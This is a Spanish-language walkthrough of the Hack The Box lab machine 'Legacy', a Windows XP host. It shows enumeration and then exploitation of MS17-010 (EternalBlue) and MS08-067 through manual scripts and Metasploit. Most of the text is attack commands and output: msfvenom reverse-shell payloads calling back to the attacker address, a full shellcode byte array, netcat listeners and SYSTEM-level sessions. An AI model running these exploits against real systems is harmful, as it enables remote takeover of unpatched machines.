Legacy
OS: Windows
Dificultad: Fácil
Puntos: 20
Nmap Scan
ports=$(nmap -p- --min-rate=5000 -T4 10.10.10.4 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)nmap -p $ports -sC -sV 10.10.10.4Nmap scan report for 10.10.10.4
Host is up (0.047s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xpEnumeracion
La maquina solo cuenta con los puertos 135, 139 y 445 que son referentes al servicio SMB. Algo curioso es que el sistema operativo es un Windows XP.
Usando los script de automatizacion de nmap identificamos que es vulnerable a MS17-010 conocido tambien como Eternal Blue. Adicional es vulnerable a MS08-067.
nmap -p $ports --script *vuln* 10.10.10.4| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).Verificamos la version de SMB que esta utlizando el servicio.
netexec smb 10.10.10.4SMB 10.10.10.4 445 LEGACY [*] Windows 5.1 x32 (name:LEGACY) (domain:legacy) (signing:False) (SMBv1:True)MS17-010 - Eternal Blue (CVE-2017-0143)
La vulnerabilidad MS17-010, también conocida como “EternalBlue”, es una falla crítica en el protocolo SMB (Server Message Block) de Windows, que permite a los atacantes ejecutar código remoto de forma arbitraria en sistemas vulnerables.
Podemos explotar esta vulnerabilidad de diferentes formas. Primero lo intentaremos de forma manual con los scripts de este repositiorio.
Configuracion python2
Para utlizar estos script es necesario python2. Instalamos pip en python2.
wget https://bootstrap.pypa.io/pip/2.7/get-pip.py
python2 get-pip.pyActualizamos setuptools e instalamos virtualenv.
python2 -m pip install setuptools --upgrade
python2 -m pip install virtualenvAhora nos creamos un entorno virtual para no afectar el entorno actual.
python2 -m virtualenv /opt/venv2Activamos el entorno.
source /opt/venv2/bin/activateInstalar Impacket
Instalamos una version de impacket que soporte python2 en este caso usaremos la 0.10.0.
pip install impacket==0.10.0Ahora si descargamos los script que vamos a usar.
git clone https://github.com/helviojunior/MS17-010Exploit
Creamos primero nuestro ejecutable que nos regresara una reverse shell.
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.2 LPORT=1234 -f exe -o shell.exe[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: shell.exeAhora ponemos a la escucha nuestro netcat.
nc -lvnp 1234Por ultimo ejecutas nuestro payload.
python /opt/MS17-010/send_and_execute.py 10.10.10.4 shell.exeY nos regresara una reverse shell.
Nos podemos percatar que no podemos usar el comando whoami o echo %username% para saber que usuario somos por lo tanto hacemos lo siguiente. Copiamos el binario whoami de nuestro kali linux.
cp /usr/share/windows-binaries/whoami.exe .Posteriormente creamos un servidor smb donde se encuentra nuestro binario.
impacket-smbserver tmp . -smb2supportImpacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsedLo consultamos desde la maquina legacy.
\\10.10.14.2\tmp\whoami.exe
Metasploit
Tambien es posible usar el modulo de metasploit.
msf6 > use exploit/windows/smb/ms17_010_psexec
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 10.10.10.4
RHOSTS => 10.10.10.4
msf6 exploit(windows/smb/ms17_010_psexec) > set LHOST 10.10.14.2
LHOST => 10.10.14.2
msf6 exploit(windows/smb/ms17_010_psexec) > run
[*] Started reverse TCP handler on 10.10.14.2:4444
[*] 10.10.10.4:445 - Target OS: Windows 5.1
[*] 10.10.10.4:445 - Filling barrel with fish... done
[*] 10.10.10.4:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.10.10.4:445 - [*] Preparing dynamite...
[*] 10.10.10.4:445 - [*] Trying stick 1 (x86)...Boom!
[*] 10.10.10.4:445 - [+] Successfully Leaked Transaction!
[*] 10.10.10.4:445 - [+] Successfully caught Fish-in-a-barrel
[*] 10.10.10.4:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 10.10.10.4:445 - Reading from CONNECTION struct at: 0x863a1938
[*] 10.10.10.4:445 - Built a write-what-where primitive...
[+] 10.10.10.4:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.10.10.4:445 - Selecting native target
[*] 10.10.10.4:445 - Uploading payload... aQWHhbhQ.exe
[*] 10.10.10.4:445 - Created \aQWHhbhQ.exe...
[+] 10.10.10.4:445 - Service started successfully...
[*] Sending stage (177734 bytes) to 10.10.10.4
[*] 10.10.10.4:445 - Deleting \aQWHhbhQ.exe...
[*] Meterpreter session 2 opened (10.10.14.2:4444 -> 10.10.10.4:1038) at 2025-01-07 07:02:38 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEMMS08-067 - Code Execution (CVE-2008-4250)
The MS08-067 vulnerability is a critical flaw in the Server service of several versions of Windows (such as XP, Vista, and 2000). It allows an attacker to remotely execute malicious code over the network, without user interaction, by sending specially crafted packets to the vulnerable system.
Para explotar la segunda vulnerabilidad utilizaremos el siguiente script. Primero creamos nuestro shellcode.
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.2 LPORT=1234 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windowsFound 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai failed with A valid opcode permutation could not be found.
Attempting to encode payload with 1 iterations of x86/call4_dword_xor
x86/call4_dword_xor succeeded with size 348 (iteration=0)
x86/call4_dword_xor chosen with final size 348
Payload size: 348 bytes
Final size of c file: 1491 bytes
unsigned char buf[] =
"\x31\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76"
"\x0e\xf7\x96\xa8\x9f\x83\xee\xfc\xe2\xf4\x0b\x7e\x2a\x9f"
"\xf7\x96\xc8\x16\x12\xa7\x68\xfb\x7c\xc6\x98\x14\xa5\x9a"
"\x23\xcd\xe3\x1d\xda\xb7\xf8\x21\xe2\xb9\xc6\x69\x04\xa3"
"\x96\xea\xaa\xb3\xd7\x57\x67\x92\xf6\x51\x4a\x6d\xa5\xc1"
"\x23\xcd\xe7\x1d\xe2\xa3\x7c\xda\xb9\xe7\x14\xde\xa9\x4e"
"\xa6\x1d\xf1\xbf\xf6\x45\x23\xd6\xef\x75\x92\xd6\x7c\xa2"
"\x23\x9e\x21\xa7\x57\x33\x36\x59\xa5\x9e\x30\xae\x48\xea"
"\x01\x95\xd5\x67\xcc\xeb\x8c\xea\x13\xce\x23\xc7\xd3\x97"
"\x7b\xf9\x7c\x9a\xe3\x14\xaf\x8a\xa9\x4c\x7c\x92\x23\x9e"
"\x27\x1f\xec\xbb\xd3\xcd\xf3\xfe\xae\xcc\xf9\x60\x17\xc9"
"\xf7\xc5\x7c\x84\x43\x12\xaa\xfe\x9b\xad\xf7\x96\xc0\xe8"
"\x84\xa4\xf7\xcb\x9f\xda\xdf\xb9\xf0\x69\x7d\x27\x67\x97"
"\xa8\x9f\xde\x52\xfc\xcf\x9f\xbf\x28\xf4\xf7\x69\x7d\xcf"
"\xa7\xc6\xf8\xdf\xa7\xd6\xf8\xf7\x1d\x99\x77\x7f\x08\x43"
"\x3f\xf5\xf2\xfe\xa2\x95\xf9\x94\xc0\x9d\xf7\x92\x7a\x16"
"\x11\xfc\xb8\xc9\xa0\xfe\x31\x3a\x83\xf7\x57\x4a\x72\x56"
"\xdc\x93\x08\xd8\xa0\xea\x1b\xfe\x58\x2a\x55\xc0\x57\x4a"
"\x9f\xf5\xc5\xfb\xf7\x1f\x4b\xc8\xa0\xc1\x99\x69\x9d\x84"
"\xf1\xc9\x15\x6b\xce\x58\xb3\xb2\x94\x9e\xf6\x1b\xec\xbb"
"\xe7\x50\xa8\xdb\xa3\xc6\xfe\xc9\xa1\xd0\xfe\xd1\xa1\xc0"
"\xfb\xc9\x9f\xef\x64\xa0\x71\x69\x7d\x16\x17\xd8\xfe\xd9"
"\x08\xa6\xc0\x97\x70\x8b\xc8\x60\x22\x2d\x48\x82\xdd\x9c"
"\xc0\x39\x62\x2b\x35\x60\x22\xaa\xae\xe3\xfd\x16\x53\x7f"
"\x82\x93\x13\xd8\xe4\xe4\xc7\xf5\xf7\xc5\x57\x4a"Copiamos el output en el script de python.
| |
Ponemos a la escucha nuestro netcat.
nc -lvnp 1234Ejecutamos el siguiente comando.
python ms08_067/ms08_067_2018.py 10.10.10.4 6 445De esta forma obtenemos nuestra reverse shell.
Metasploit
Tambien podemos hacer uso del modulo de metasploit.
msf6 > use exploit/windows/smb/ms08_067_netapi
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 10.10.10.4
RHOSTS => 10.10.10.4
msf6 exploit(windows/smb/ms08_067_netapi) > set LHOST 10.10.14.2
LHOST => 10.10.14.2
msf6 exploit(windows/smb/ms08_067_netapi) > run
[*] Started reverse TCP handler on 10.10.14.2:4444
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (177734 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.2:4444 -> 10.10.10.4:1037) at 2025-01-07 06:57:52 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEMReferencias
https://github.com/helviojunior/MS17-010
https://github.com/fortra/impacket
https://github.com/andyacer/ms08_067